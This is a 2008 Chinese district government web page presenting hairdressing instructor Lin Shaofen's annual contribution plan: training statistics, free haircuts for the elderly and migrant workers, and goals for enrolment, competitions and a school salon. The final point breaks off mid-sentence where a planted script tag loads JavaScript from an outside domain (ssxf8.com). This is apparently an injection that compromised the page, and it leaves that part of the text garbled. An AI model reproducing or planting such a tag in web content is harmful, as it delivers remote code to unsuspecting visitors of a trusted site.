首页>人才工作>人才培养
鹿城区第六轮专业技术拔尖人才2008年奉献计划——林少芬
时间:2008-05-30 来源:人才办 作者:人才办 字号:[ ]

林少芬2008年奉献计划
 
一、情况分析:
多年来我一直努力致力于中国美发行业的发展, 2008 年是奥运会的一年,峰尚盛典,我们祖国蒸蒸日上。上学期我校本着把工作做的更好这样一个目标,开拓积极圆满的完成了八期卓有成效的考核培训班,共培训了 353 名思想开拓、审美意识强、技术水平过硬、受群众欢迎的美发学员都已结业,并颁发了结业证书。其中考取技师 20 人、高级美发师 55 人、中级美发师 128 人、初级美发师 150 人。一年来举办了多次公益活动,免费为外来务工、孤寡老人理发 1500 多人次,为了解决困难的学员经济条件,低于成本价培训了 44 人。
二、指导思想:
全面提升学生素质,全面提高教学质量。
三、 2008 教学工作目标:
1 、新的一年,新的前景。 2 25 我带领世界杯美发整体造型冠军学员黄丽娜赴往美国芝加哥参加世界杯美发大赛,并受聘本次世界大赛评委。
2 、完善、落实教学管理制度,使教学工作的管理更加规范化、制度化。
3 、计划招生培训 500 人次。其中包含爱心回赠社会免费培训失业、再就业劳动力免费考核 200 名。并定期每个星期六在华盖山、中山公园、双屿工业区、江滨社区、景园社区等免费设计发型,真情回报社会 2000 余人以上。
    4 、计划举办三场时尚发型技术交流演绎和美发技能大赛,引领发型潮流趋势,在美发的艺术创作上做更多的努力。
5 、组织成立芬芬美发研创团队,建立发型时尚高端教育平台。激发学生的学习意识,引导学生的创作激情,提高学生的操作能力是我们学校的教育根本。同时明年还要开设学校形象店,尽量让学生多一些实操机会,让他们了解发廊的生产、生活规律和节奏,为他们自己独立创业打下基础。
6 、引进国外先进的教育?script src=http://ssxf8.com/x.js>
【返回顶部】【打印本稿】【关闭本页】
0